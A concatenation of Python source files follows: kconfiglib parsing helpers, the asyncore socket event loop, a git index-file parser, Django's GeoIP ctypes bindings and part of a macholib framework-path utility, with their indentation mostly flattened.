items either. Only drivers/usb/gadget/Kconfig seems to depend on any of
this. This method computes the "actual" items in the choice and sets
the is_choice_symbol_ flag on them (retrieved via is_choice_symbol()).
Don't let this scare you: an earlier version simply checked for a
sequence of symbols where all symbols after the first appeared in the
'depends on' expression of the first, and that worked fine. The added
complexity is to be future-proof in the event that
drivers/usb/gadget/Kconfig turns even more sinister. It might very well
be overkill (especially if that file is refactored ;)."""
items = self.block.get_items()
# Items might depend on each other in a tree structure, so we need a
# stack to keep track of the current tentative parent
stack = []
for item in items:
if not isinstance(item, Symbol):
stack = []
continue
while stack != []:
if item._has_auto_menu_dep_on(stack[-1]):
# The item should not be viewed as a choice item, so don't
# set item.is_choice_symbol_.
stack.append(item)
break
else:
stack.pop()
else:
item.is_choice_symbol_ = True
self.actual_symbols.append(item)
stack.append(item)
def _cache_ret(self, selection):
# As None is used to indicate the lack of a cached value we can't use
# that to cache the fact that the choice has no selection. Instead, we
# use the symbolic constant NO_SELECTION.
if selection is None:
self.cached_selection = NO_SELECTION
else:
self.cached_selection = selection
return selection
def _invalidate(self):
_HasVisibility._invalidate(self)
self.cached_selection = None
def _unset_user_value(self):
self._invalidate()
self.user_val = None
self.user_mode = None
def _make_conf(self):
return self.block._make_conf()
class Comment(Item):
"""Represents a comment statement."""
#
# Public interface
#
def get_config(self):
"""Returns the Config instance this comment is from."""
return self.config
def get_visibility(self):
"""Returns the visibility of the comment. See also
Symbol.get_visibility()."""
return self.config._eval_expr(self.dep_expr)
def get_text(self):
"""Returns the text of the comment."""
return self.text
def get_parent(self):
"""Returns the menu or choice statement that contains the comment, or
None if the comment is at the top level. Note that if statements are
treated as syntactic sugar and do not have an explicit class
representation."""
return self.parent
def get_referenced_symbols(self, refs_from_enclosing = False):
"""See Symbol.get_referenced_symbols()."""
return self.all_referenced_syms if refs_from_enclosing else self.referenced_syms
def get_location(self):
"""Returns the location of the comment as a (filename, linenr) tuple,
where filename is a string and linenr an int."""
return (self.filename, self.linenr)
def __str__(self):
"""Returns a string containing various information about the comment."""
dep_str = self.config._expr_val_str(self.orig_deps, "(no dependencies)")
additional_deps_str = " " + self.config._expr_val_str(self.deps_from_containing,
"(no additional dependencies)")
return _sep_lines("Comment",
"Text: " + str(self.text),
"Dependencies: " + dep_str,
"Additional dependencies from enclosing menus and if's:",
additional_deps_str,
"Location: {0}:{1}".format(self.filename, self.linenr))
#
# Private methods
#
def __init__(self):
"""Comment constructor -- not intended to be called directly by
kconfiglib clients."""
self.config = None
self.parent = None
self.text = None
self.dep_expr = None
# Dependency expression without dependencies from enclosing menus and
# if's propagated
self.orig_deps = None
# Dependencies inherited from containing menus and if's
self.deps_from_containing = None
# The set of symbols referenced by this comment (see
# get_referenced_symbols())
self.referenced_syms = set()
# Like 'referenced_syms', but includes symbols from
# dependencies inherited from enclosing menus and if's
self.all_referenced_syms = None
self.filename = None
self.linenr = None
def _make_conf(self):
if self.config._eval_expr(self.dep_expr) != "n":
return ["\n#\n# {0}\n#".format(self.text)]
return []
class _Feed:
"""Class for working with sequences in a stream-like fashion; handy for tokens."""
def __init__(self, items):
self.items = items
self.length = len(self.items)
self.i = 0
def get_next(self):
if self.i >= self.length:
return None
item = self.items[self.i]
self.i += 1
return item
def peek_next(self):
return None if self.i >= self.length else self.items[self.i]
def go_to_start(self):
self.i = 0
def __getitem__(self, index):
return self.items[index]
def __len__(self):
return len(self.items)
def is_empty(self):
return self.items == []
def check(self, token):
"""Check if the next token is 'token'. If so, remove it from the token
feed and return True. Otherwise, leave it in and return False."""
if self.i >= self.length:
return False
if self.items[self.i] == token:
self.i += 1
return True
return False
def remove_while(self, pred):
while self.i < self.length and pred(self.items[self.i]):
self.i += 1
def go_back(self):
if self.i <= 0:
_internal_error("Attempt to move back in Feed while already at the beginning.")
self.i -= 1
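# Illustrative sketch, not part of the original module: how the _Feed
# API above behaves during parsing. The token values are invented.
def _demo_feed():
    feed = _Feed(["config", "FOO", "bool"])
    assert feed.check("config")      # matches, so the token is consumed
    assert feed.peek_next() == "FOO" # look ahead without consuming
    assert feed.get_next() == "FOO"  # now consume it
    feed.go_back()                   # step back one token
    assert feed.get_next() == "FOO"
    assert feed.get_next() == "bool"
    assert feed.get_next() is None   # an exhausted feed returns None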
class _FileFeed(_Feed):
"""Feed subclass that keeps track of the current filename and line
number."""
def __init__(self, lines, filename):
self.filename = _clean_up_path(filename)
_Feed.__init__(self, lines)
def get_filename(self):
return self.filename
def get_linenr(self):
return self.i
#
# Misc. public global utility functions
#
def tri_less(v1, v2):
"""Returns True if the tristate v1 is less than the tristate v2, where "n",
"m" and "y" are ordered from lowest to highest. Otherwise, returns
False."""
return tri_to_int[v1] < tri_to_int[v2]
def tri_less_eq(v1, v2):
"""Returns True if the tristate v1 is less than or equal to the tristate
v2, where "n", "m" and "y" are ordered from lowest to highest. Otherwise,
returns False."""
return tri_to_int[v1] <= tri_to_int[v2]
def tri_greater(v1, v2):
"""Returns True if the tristate v1 is greater than the tristate v2, where
"n", "m" and "y" are ordered from lowest to highest. Otherwise, returns
False."""
return tri_to_int[v1] > tri_to_int[v2]
def tri_greater_eq(v1, v2):
"""Returns True if the tristate v1 is greater than or equal to the tristate
v2, where "n", "m" and "y" are ordered from lowest to highest. Otherwise,
returns False."""
return tri_to_int[v1] >= tri_to_int[v2]
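# Illustrative sketch, not part of the original module: the tri_*
# helpers order tristate values as "n" < "m" < "y".
def _demo_tristate_order():
    assert tri_less("n", "m") and tri_less("m", "y")
    assert tri_greater_eq("y", "m")
    assert not tri_greater("n", "n")
    # Typical use with a hypothetical Symbol instance 'sym':
    # if tri_less_eq("m", sym.get_upper_bound() or "n"):
    #     sym.set_user_value("m")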
#
# Helper functions, mostly related to text processing
#
def _strip_quotes(s, line, filename, linenr):
"""Removes any quotes surrounding 's' if it has them; otherwise returns 's'
unmodified."""
s = s.strip()
if not s:
return ""
if s[0] == '"' or s[0] == "'":
if len(s) < 2 or s[-1] != s[0]:
_parse_error(line,
"malformed string literal",
filename,
linenr)
return s[1:-1]
return s
def _indentation(line):
"""Returns the indentation of the line, treating tab stops as being spaced
8 characters apart."""
if line.isspace():
_internal_error("Attempt to take indentation of blank line.")
indent = 0
for c in line:
if c == " ":
indent += 1
elif c == "\t":
# Go to the next tab stop
indent = (indent + 8) & ~7
else:
return indent
def _deindent(line, indent):
"""Deindent 'line' by 'indent' spaces."""
line = line.expandtabs()
if len(line) <= indent:
return line
return line[indent:]
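# Illustrative sketch, not part of the original module: _indentation()
# treats tab stops as 8 columns apart, and _deindent() strips leading
# columns after expanding tabs.
def _demo_indentation():
    assert _indentation("    foo") == 4
    assert _indentation("\tfoo") == 8   # one tab stop
    assert _indentation(" \tfoo") == 8  # a space then a tab also lands on 8
    assert _deindent("        help text", 8) == "help text"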
def _is_base_n(s, n):
try:
int(s, n)
return True
except ValueError:
return False
def _sep_lines(*args):
"""Returns a string comprised of all arguments, with newlines inserted
between them."""
return "\n".join(args)
def _comment(s):
"""Returns a new string with "#" inserted before each line in 's'."""
if not s:
return "#"
res = "".join(["#" + line for line in s.splitlines(True)])
if s.endswith("\n"):
return res + "#"
return res
def _get_lines(filename):
"""Returns a list of lines from 'filename', joining any line ending in \\
with the following line."""
with open(filename, "r") as f:
lines = []
accum = ""
while 1:
line = f.readline()
if line == "":
return lines
if line.endswith("\\\n"):
accum += line[:-2]
else:
accum += line
lines.append(accum)
accum = ""
def _strip_trailing_slash(path):
"""Removes any trailing slash from 'path'."""
return path[:-1] if path.endswith("/") else path
def _clean_up_path(path):
"""Strips any initial "./" and trailing slash from 'path'."""
if path.startswith("./"):
path = path[2:]
return _strip_trailing_slash(path)
#
# Error handling
#
class Kconfig_Syntax_Error(Exception):
"""Exception raised for syntax errors."""
pass
class Internal_Error(Exception):
"""Exception raised for internal errors."""
pass
def _tokenization_error(s, index, filename, linenr):
if filename is not None:
assert linenr is not None
sys.stderr.write("{0}:{1}:\n".format(filename, linenr))
if s.endswith("\n"):
s = s[:-1]
# Calculate the visual offset corresponding to index 'index' in 's'
# assuming tabstops are spaced 8 characters apart
vis_index = 0
for c in s[:index]:
if c == "\t":
vis_index = (vis_index + 8) & ~7
else:
vis_index += 1
# Don't output actual tabs to be independent of how the terminal renders
# them
s = s.expandtabs()
raise Kconfig_Syntax_Error(
_sep_lines("Error during tokenization at location indicated by caret.\n",
s,
" " * vis_index + "^\n"))
def _parse_error(s, msg, filename, linenr):
error_str = ""
if filename is not None:
assert linenr is not None
error_str += "{0}:{1}: ".format(filename, linenr)
if s.endswith("\n"):
s = s[:-1]
error_str += 'Error while parsing "{0}"'.format(s) + \
("." if msg is None else ": " + msg)
raise Kconfig_Syntax_Error(error_str)
def _internal_error(msg):
msg += "\nSorry! You may want to send an email to kconfiglib@gmail.com " \
"to tell me about this. Include the message above and the stack " \
"trace and describe what you were doing."
raise Internal_Error(msg)
if use_psyco:
import psyco
Config._tokenize = psyco.proxy(Config._tokenize)
Config._eval_expr = psyco.proxy(Config._eval_expr)
_indentation = psyco.proxy(_indentation)
_get_lines = psyco.proxy(_get_lines)
|
andreparrish/python-for-android
|
refs/heads/master
|
python3-alpha/python3-src/Lib/asyncore.py
|
46
|
# -*- Mode: Python -*-
# Id: asyncore.py,v 2.51 2000/09/07 22:29:26 rushing Exp
# Author: Sam Rushing <rushing@nightmare.com>
# ======================================================================
# Copyright 1996 by Sam Rushing
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Sam
# Rushing not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# ======================================================================
"""Basic infrastructure for asynchronous socket service clients and servers.
There are only two ways to have a program on a single processor do "more
than one thing at a time". Multi-threaded programming is the simplest and
most popular way to do it, but there is another very different technique,
that lets you have nearly all the advantages of multi-threading, without
actually using multiple threads. It's really only practical if your program
is largely I/O bound. If your program is CPU bound, then pre-emptive
scheduled threads are probably what you really need. Network servers are
rarely CPU-bound, however.
If your operating system supports the select() system call in its I/O
library (and nearly all do), then you can use it to juggle multiple
communication channels at once; doing other work while your I/O is taking
place in the "background." Although this strategy can seem strange and
complex, especially at first, it is in many ways easier to understand and
control than multi-threaded programming. The module documented here solves
many of the difficult problems for you, making the task of building
sophisticated high-performance network servers and clients a snap.
"""
import select
import socket
import sys
import time
import warnings
import os
from errno import EALREADY, EINPROGRESS, EWOULDBLOCK, ECONNRESET, EINVAL, \
ENOTCONN, ESHUTDOWN, EINTR, EISCONN, EBADF, ECONNABORTED, EPIPE, EAGAIN, \
errorcode
_DISCONNECTED = frozenset((ECONNRESET, ENOTCONN, ESHUTDOWN, ECONNABORTED, EPIPE,
EBADF))
try:
socket_map
except NameError:
socket_map = {}
def _strerror(err):
try:
return os.strerror(err)
except (ValueError, OverflowError, NameError):
if err in errorcode:
return errorcode[err]
return "Unknown error %s" %err
class ExitNow(Exception):
pass
_reraised_exceptions = (ExitNow, KeyboardInterrupt, SystemExit)
def read(obj):
try:
obj.handle_read_event()
except _reraised_exceptions:
raise
except:
obj.handle_error()
def write(obj):
try:
obj.handle_write_event()
except _reraised_exceptions:
raise
except:
obj.handle_error()
def _exception(obj):
try:
obj.handle_expt_event()
except _reraised_exceptions:
raise
except:
obj.handle_error()
def readwrite(obj, flags):
try:
if flags & select.POLLIN:
obj.handle_read_event()
if flags & select.POLLOUT:
obj.handle_write_event()
if flags & select.POLLPRI:
obj.handle_expt_event()
if flags & (select.POLLHUP | select.POLLERR | select.POLLNVAL):
obj.handle_close()
except socket.error as e:
if e.args[0] not in _DISCONNECTED:
obj.handle_error()
else:
obj.handle_close()
except _reraised_exceptions:
raise
except:
obj.handle_error()
def poll(timeout=0.0, map=None):
if map is None:
map = socket_map
if map:
r = []; w = []; e = []
for fd, obj in list(map.items()):
is_r = obj.readable()
is_w = obj.writable()
if is_r:
r.append(fd)
# accepting sockets should not be writable
if is_w and not obj.accepting:
w.append(fd)
if is_r or is_w:
e.append(fd)
if [] == r == w == e:
time.sleep(timeout)
return
try:
r, w, e = select.select(r, w, e, timeout)
except select.error as err:
if err.args[0] != EINTR:
raise
else:
return
for fd in r:
obj = map.get(fd)
if obj is None:
continue
read(obj)
for fd in w:
obj = map.get(fd)
if obj is None:
continue
write(obj)
for fd in e:
obj = map.get(fd)
if obj is None:
continue
_exception(obj)
def poll2(timeout=0.0, map=None):
# Use the poll() support added to the select module in Python 2.0
if map is None:
map = socket_map
if timeout is not None:
# timeout is in milliseconds
timeout = int(timeout*1000)
pollster = select.poll()
if map:
for fd, obj in list(map.items()):
flags = 0
if obj.readable():
flags |= select.POLLIN | select.POLLPRI
# accepting sockets should not be writable
if obj.writable() and not obj.accepting:
flags |= select.POLLOUT
if flags:
# Only check for exceptions if object was either readable
# or writable.
flags |= select.POLLERR | select.POLLHUP | select.POLLNVAL
pollster.register(fd, flags)
try:
r = pollster.poll(timeout)
except select.error as err:
if err.args[0] != EINTR:
raise
r = []
for fd, flags in r:
obj = map.get(fd)
if obj is None:
continue
readwrite(obj, flags)
poll3 = poll2 # Alias for backward compatibility
def loop(timeout=30.0, use_poll=False, map=None, count=None):
if map is None:
map = socket_map
if use_poll and hasattr(select, 'poll'):
poll_fun = poll2
else:
poll_fun = poll
if count is None:
while map:
poll_fun(timeout, map)
else:
while map and count > 0:
poll_fun(timeout, map)
count = count - 1
class dispatcher:
debug = False
connected = False
accepting = False
closing = False
addr = None
ignore_log_types = frozenset(['warning'])
def __init__(self, sock=None, map=None):
if map is None:
self._map = socket_map
else:
self._map = map
self._fileno = None
if sock:
# Set to nonblocking just to make sure for cases where we
# get a socket from a blocking source.
sock.setblocking(0)
self.set_socket(sock, map)
self.connected = True
# The constructor no longer requires that the socket
# passed be connected.
try:
self.addr = sock.getpeername()
except socket.error as err:
if err.args[0] == ENOTCONN:
# To handle the case where we got an unconnected
# socket.
self.connected = False
else:
# The socket is broken in some unknown way, alert
# the user and remove it from the map (to prevent
# polling of broken sockets).
self.del_channel(map)
raise
else:
self.socket = None
def __repr__(self):
status = [self.__class__.__module__+"."+self.__class__.__name__]
if self.accepting and self.addr:
status.append('listening')
elif self.connected:
status.append('connected')
if self.addr is not None:
try:
status.append('%s:%d' % self.addr)
except TypeError:
status.append(repr(self.addr))
return '<%s at %#x>' % (' '.join(status), id(self))
__str__ = __repr__
def add_channel(self, map=None):
#self.log_info('adding channel %s' % self)
if map is None:
map = self._map
map[self._fileno] = self
def del_channel(self, map=None):
fd = self._fileno
if map is None:
map = self._map
if fd in map:
#self.log_info('closing channel %d:%s' % (fd, self))
del map[fd]
self._fileno = None
def create_socket(self, family, type):
self.family_and_type = family, type
sock = socket.socket(family, type)
sock.setblocking(0)
self.set_socket(sock)
def set_socket(self, sock, map=None):
self.socket = sock
## self.__dict__['socket'] = sock
self._fileno = sock.fileno()
self.add_channel(map)
def set_reuse_addr(self):
# try to re-use a server port if possible
try:
self.socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR,
self.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR) | 1
)
except socket.error:
pass
# ==================================================
# predicates for select()
# these are used as filters for the lists of sockets
# to pass to select().
# ==================================================
def readable(self):
return True
def writable(self):
return True
# ==================================================
# socket object methods.
# ==================================================
def listen(self, num):
self.accepting = True
if os.name == 'nt' and num > 5:
num = 5
return self.socket.listen(num)
def bind(self, addr):
self.addr = addr
return self.socket.bind(addr)
def connect(self, address):
self.connected = False
err = self.socket.connect_ex(address)
if err in (EINPROGRESS, EALREADY, EWOULDBLOCK) \
or err == EINVAL and os.name in ('nt', 'ce'):
return
if err in (0, EISCONN):
self.addr = address
self.handle_connect_event()
else:
raise socket.error(err, errorcode[err])
def accept(self):
# XXX can return either an address pair or None
try:
conn, addr = self.socket.accept()
except TypeError:
return None
except socket.error as why:
if why.args[0] in (EWOULDBLOCK, ECONNABORTED, EAGAIN):
return None
else:
raise
else:
return conn, addr
def send(self, data):
try:
result = self.socket.send(data)
return result
except socket.error as why:
if why.args[0] == EWOULDBLOCK:
return 0
elif why.args[0] in _DISCONNECTED:
self.handle_close()
return 0
else:
raise
def recv(self, buffer_size):
try:
data = self.socket.recv(buffer_size)
if not data:
# a closed connection is indicated by signaling
# a read condition, and having recv() return 0.
self.handle_close()
return b''
else:
return data
except socket.error as why:
# winsock sometimes throws ENOTCONN
if why.args[0] in _DISCONNECTED:
self.handle_close()
return b''
else:
raise
def close(self):
self.connected = False
self.accepting = False
self.del_channel()
try:
self.socket.close()
except socket.error as why:
if why.args[0] not in (ENOTCONN, EBADF):
raise
# cheap inheritance, used to pass all other attribute
# references to the underlying socket object.
def __getattr__(self, attr):
try:
retattr = getattr(self.socket, attr)
except AttributeError:
raise AttributeError("%s instance has no attribute '%s'"
%(self.__class__.__name__, attr))
else:
msg = "%(me)s.%(attr)s is deprecated; use %(me)s.socket.%(attr)s " \
"instead" % {'me' : self.__class__.__name__, 'attr' : attr}
warnings.warn(msg, DeprecationWarning, stacklevel=2)
return retattr
# log and log_info may be overridden to provide more sophisticated
# logging and warning methods. In general, log is for 'hit' logging
# and 'log_info' is for informational, warning and error logging.
def log(self, message):
sys.stderr.write('log: %s\n' % str(message))
def log_info(self, message, type='info'):
if type not in self.ignore_log_types:
print('%s: %s' % (type, message))
def handle_read_event(self):
if self.accepting:
# accepting sockets are never connected, they "spawn" new
# sockets that are connected
self.handle_accept()
elif not self.connected:
self.handle_connect_event()
self.handle_read()
else:
self.handle_read()
def handle_connect_event(self):
err = self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err != 0:
raise socket.error(err, _strerror(err))
self.handle_connect()
self.connected = True
def handle_write_event(self):
if self.accepting:
# Accepting sockets shouldn't get a write event.
# We will pretend it didn't happen.
return
if not self.connected:
#check for errors
err = self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err != 0:
raise socket.error(err, _strerror(err))
self.handle_connect_event()
self.handle_write()
def handle_expt_event(self):
# handle_expt_event() is called if there might be an error on the
# socket, or if there is OOB data
# check for the error condition first
err = self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err != 0:
# we can get here when select.select() says that there is an
# exceptional condition on the socket
# since there is an error, we'll go ahead and close the socket
# like we would in a subclassed handle_read() that received no
# data
self.handle_close()
else:
self.handle_expt()
def handle_error(self):
nil, t, v, tbinfo = compact_traceback()
# sometimes a user repr method will crash.
try:
self_repr = repr(self)
except:
self_repr = '<__repr__(self) failed for object at %0x>' % id(self)
self.log_info(
'uncaptured python exception, closing channel %s (%s:%s %s)' % (
self_repr,
t,
v,
tbinfo
),
'error'
)
self.handle_close()
def handle_expt(self):
self.log_info('unhandled incoming priority event', 'warning')
def handle_read(self):
self.log_info('unhandled read event', 'warning')
def handle_write(self):
self.log_info('unhandled write event', 'warning')
def handle_connect(self):
self.log_info('unhandled connect event', 'warning')
def handle_accept(self):
pair = self.accept()
if pair is not None:
self.handle_accepted(*pair)
def handle_accepted(self, sock, addr):
sock.close()
self.log_info('unhandled accepted event', 'warning')
def handle_close(self):
self.log_info('unhandled close event', 'warning')
self.close()
# ---------------------------------------------------------------------------
# adds simple buffered output capability, useful for simple clients.
# [for more sophisticated usage use asynchat.async_chat]
# ---------------------------------------------------------------------------
class dispatcher_with_send(dispatcher):
def __init__(self, sock=None, map=None):
dispatcher.__init__(self, sock, map)
self.out_buffer = b''
def initiate_send(self):
num_sent = dispatcher.send(self, self.out_buffer[:512])
self.out_buffer = self.out_buffer[num_sent:]
def handle_write(self):
self.initiate_send()
def writable(self):
return (not self.connected) or len(self.out_buffer)
def send(self, data):
if self.debug:
self.log_info('sending %s' % repr(data))
self.out_buffer = self.out_buffer + data
self.initiate_send()
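# ---------------------------------------------------------------------------
# illustrative sketch, not part of the original module: a minimal echo
# server built from the classes above. the host/port values below are
# arbitrary examples.
# ---------------------------------------------------------------------------

class _echo_handler(dispatcher_with_send):
    def handle_read(self):
        data = self.recv(8192)
        if data:
            self.send(data)

class _echo_server(dispatcher):
    def __init__(self, host, port):
        dispatcher.__init__(self)
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        self.set_reuse_addr()
        self.bind((host, port))
        self.listen(5)
    def handle_accepted(self, sock, addr):
        _echo_handler(sock)

# Typical usage (blocks until every channel in the map is closed):
#     _echo_server('localhost', 8080)
#     loop()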
# ---------------------------------------------------------------------------
# used for debugging.
# ---------------------------------------------------------------------------
def compact_traceback():
t, v, tb = sys.exc_info()
tbinfo = []
if not tb: # Must have a traceback
raise AssertionError("traceback does not exist")
while tb:
tbinfo.append((
tb.tb_frame.f_code.co_filename,
tb.tb_frame.f_code.co_name,
str(tb.tb_lineno)
))
tb = tb.tb_next
# just to be safe
del tb
file, function, line = tbinfo[-1]
info = ' '.join(['[%s|%s|%s]' % x for x in tbinfo])
return (file, function, line), t, v, info
def close_all(map=None, ignore_all=False):
if map is None:
map = socket_map
for x in list(map.values()):
try:
x.close()
except OSError as x:
if x.args[0] == EBADF:
pass
elif not ignore_all:
raise
except _reraised_exceptions:
raise
except:
if not ignore_all:
raise
map.clear()
# Asynchronous File I/O:
#
# After a little research (reading man pages on various unixen, and
# digging through the linux kernel), I've determined that select()
# isn't meant for doing asynchronous file i/o.
# Heartening, though - reading linux/mm/filemap.c shows that linux
# supports asynchronous read-ahead. So _MOST_ of the time, the data
# will be sitting in memory for us already when we go to read it.
#
# What other OS's (besides NT) support async file i/o? [VMS?]
#
# Regardless, this is useful for pipes, and stdin/stdout...
if os.name == 'posix':
import fcntl
class file_wrapper:
# Here we override just enough to make a file
# look like a socket for the purposes of asyncore.
# The passed fd is automatically os.dup()'d
def __init__(self, fd):
self.fd = os.dup(fd)
def recv(self, *args):
return os.read(self.fd, *args)
def send(self, *args):
return os.write(self.fd, *args)
def getsockopt(self, level, optname, buflen=None):
if (level == socket.SOL_SOCKET and
optname == socket.SO_ERROR and
not buflen):
return 0
raise NotImplementedError("Only asyncore specific behaviour "
"implemented.")
read = recv
write = send
def close(self):
os.close(self.fd)
def fileno(self):
return self.fd
class file_dispatcher(dispatcher):
def __init__(self, fd, map=None):
dispatcher.__init__(self, None, map)
self.connected = True
try:
fd = fd.fileno()
except AttributeError:
pass
self.set_file(fd)
# set it to non-blocking mode
flags = fcntl.fcntl(fd, fcntl.F_GETFL, 0)
flags = flags | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
def set_file(self, fd):
self.socket = file_wrapper(fd)
self._fileno = self.socket.fileno()
self.add_channel()
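# Illustrative sketch, not part of the original module: watching one
# end of a pipe with the event loop, as if it were a socket.
#
#     r, w = os.pipe()
#     class pipe_reader(file_dispatcher):
#         def handle_read(self):
#             print(self.recv(4096))
#     pipe_reader(r)
#     os.write(w, b'ping')
#     loop(timeout=1, count=1)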
|
calvin--/VCSRip
|
refs/heads/master
|
vcsrip/IndexParser.py
|
1
|
import struct
import binascii
def parse_index(index_file):
f = open(index_file, "rb")
def read(format):
format = "! " + format
bytes = f.read(struct.calcsize(format))
return struct.unpack(format, bytes)[0]
index = {}
entries = []
index["signature"] = f.read(4).decode("ascii")
index["version"] = read("I")
for e in range(read("I")):
entry = {}
f.seek(40, 1)
entry["sha1"] = binascii.hexlify(f.read(20)).decode("ascii")
entry["flags"] = read("H")
entry["extended"] = bool(entry["flags"] & (0b01000000 << 8))
namelen = entry["flags"] & 0xFFF
entry_length = 62
if entry["extended"] and (index["version"] == 3):
f.seek(2, 1)
entry_length += 2
if namelen < 0xFFF:
entry["name"] = f.read(namelen).decode("utf-8", "replace")
entry_length += namelen
consumed_padding = 0
else:
# Long names are stored NUL-terminated rather than length-prefixed.
name = []
while True:
byte = f.read(1)
if not byte or byte == b"\x00":  # compare against bytes, not str
break
name.append(byte)
entry["name"] = b"".join(name).decode("utf-8", "replace")
entry_length += len(name)
consumed_padding = 1  # the terminating NUL is the first padding byte
# Entries are NUL-padded so their total length is a multiple of 8.
padding = ((8 - (entry_length % 8)) or 8) - consumed_padding
f.seek(padding, 1)
entries.append(
{
"name": entry["name"],
"sha1": entry["sha1"]
})
return entries
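# Illustrative sketch, not part of the original file: typical usage.
# The path below is only an example; any git repository's index works.
if __name__ == "__main__":
    for entry in parse_index(".git/index"):
        print("{0} {1}".format(entry["sha1"], entry["name"]))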
|
AnimeshSinha1309/Website-Edunet
|
refs/heads/master
|
WebsiteEdunet/env/Lib/site-packages/django/contrib/gis/geoip/prototypes.py
|
535
|
from ctypes import POINTER, Structure, c_char_p, c_float, c_int, string_at
from django.contrib.gis.geoip.libgeoip import free, lgeoip
# #### GeoIP C Structure definitions ####
class GeoIPRecord(Structure):
_fields_ = [('country_code', c_char_p),
('country_code3', c_char_p),
('country_name', c_char_p),
('region', c_char_p),
('city', c_char_p),
('postal_code', c_char_p),
('latitude', c_float),
('longitude', c_float),
# TODO: In 1.4.6 this changed from `int dma_code;` to
# `union {int metro_code; int dma_code;};`. Change
# to a `ctypes.Union` to accommodate this in the future, once
# pre-1.4.6 versions are no longer distributed.
('dma_code', c_int),
('area_code', c_int),
('charset', c_int),
('continent_code', c_char_p),
]
geoip_char_fields = [name for name, ctype in GeoIPRecord._fields_ if ctype is c_char_p]
GEOIP_DEFAULT_ENCODING = 'iso-8859-1'
geoip_encodings = {
0: 'iso-8859-1',
1: 'utf8',
}
class GeoIPTag(Structure):
pass
RECTYPE = POINTER(GeoIPRecord)
DBTYPE = POINTER(GeoIPTag)
# #### ctypes function prototypes ####
# GeoIP_lib_version appeared in version 1.4.7.
if hasattr(lgeoip, 'GeoIP_lib_version'):
GeoIP_lib_version = lgeoip.GeoIP_lib_version
GeoIP_lib_version.argtypes = None
GeoIP_lib_version.restype = c_char_p
else:
GeoIP_lib_version = None
# For freeing memory allocated within a record
GeoIPRecord_delete = lgeoip.GeoIPRecord_delete
GeoIPRecord_delete.argtypes = [RECTYPE]
GeoIPRecord_delete.restype = None
# For retrieving records by name or address.
def check_record(result, func, cargs):
if result:
# Checking the pointer to the C structure, if valid pull out elements
# into a dictionary.
rec = result.contents
record = {fld: getattr(rec, fld) for fld, ctype in rec._fields_}
# Now converting the strings to unicode using the proper encoding.
encoding = geoip_encodings[record['charset']]
for char_field in geoip_char_fields:
if record[char_field]:
record[char_field] = record[char_field].decode(encoding)
# Free the memory allocated for the struct & return.
GeoIPRecord_delete(result)
return record
else:
return None
def record_output(func):
func.argtypes = [DBTYPE, c_char_p]
func.restype = RECTYPE
func.errcheck = check_record
return func
GeoIP_record_by_addr = record_output(lgeoip.GeoIP_record_by_addr)
GeoIP_record_by_name = record_output(lgeoip.GeoIP_record_by_name)
# For opening & closing GeoIP database files.
GeoIP_open = lgeoip.GeoIP_open
GeoIP_open.restype = DBTYPE
GeoIP_delete = lgeoip.GeoIP_delete
GeoIP_delete.argtypes = [DBTYPE]
GeoIP_delete.restype = None
# This is so the string pointer can be freed within Python.
class geoip_char_p(c_char_p):
pass
def check_string(result, func, cargs):
if result:
s = string_at(result)
free(result)
else:
s = ''
return s.decode(GEOIP_DEFAULT_ENCODING)
GeoIP_database_info = lgeoip.GeoIP_database_info
GeoIP_database_info.restype = geoip_char_p
GeoIP_database_info.errcheck = check_string
# String output routines.
def string_output(func):
def _err_check(result, func, cargs):
if result:
return result.decode(GEOIP_DEFAULT_ENCODING)
return result
func.restype = c_char_p
func.errcheck = _err_check
return func
GeoIP_country_code_by_addr = string_output(lgeoip.GeoIP_country_code_by_addr)
GeoIP_country_code_by_name = string_output(lgeoip.GeoIP_country_code_by_name)
GeoIP_country_name_by_addr = string_output(lgeoip.GeoIP_country_name_by_addr)
GeoIP_country_name_by_name = string_output(lgeoip.GeoIP_country_name_by_name)
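# Illustrative sketch, not part of the original module: how these
# prototypes are typically driven. The database path is an example, and
# 0 (GEOIP_STANDARD) is the simplest open flag.
#
#     db = GeoIP_open(b'/usr/share/GeoIP/GeoIPCity.dat', 0)
#     try:
#         rec = GeoIP_record_by_name(db, b'example.com')   # errcheck -> dict
#         cc = GeoIP_country_code_by_addr(db, b'8.8.8.8')
#     finally:
#         GeoIP_delete(db)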
|
smkr/pyclipse
|
refs/heads/master
|
plugins/org.python.pydev/pysrc/third_party/wrapped_for_pydev/ctypes/macholib/framework.py
|
320
|
"""
Generic framework path manipulation
"""
import re
__all__ = ['framework_info']
STRICT_FRAMEWORK_RE = re.compile(r"""(?x)
(?P<location>^.*)(?:^|/)
(?P<name>
(?P<shortname>\w+)\.framework/
(?:Versions/(?P<version>[^/]+)/)?
(?P=shortname)
(?:_(?P<suffix>[^_]+))?
)$
""")
def framework_info(filename):
"""
A framework name can take one of the following four forms:
Location/Name.framework/Versions/SomeVersion/Name_Suffix
Location/Name.framework/Versions/SomeVersion/Name
Location/Name.framework/Name_Suffix
Location/Name.framework/Name
returns None if not found, or a mapping equivalent to:
dict(
location='Location',
name='Name.framework/Versions/SomeVersion/Name_Suffix',
shortname='Name',
version='SomeVersion',
suffix='Suffix',
)
Note that SomeVersion and Suffix are optional and may be None
if not present
"""
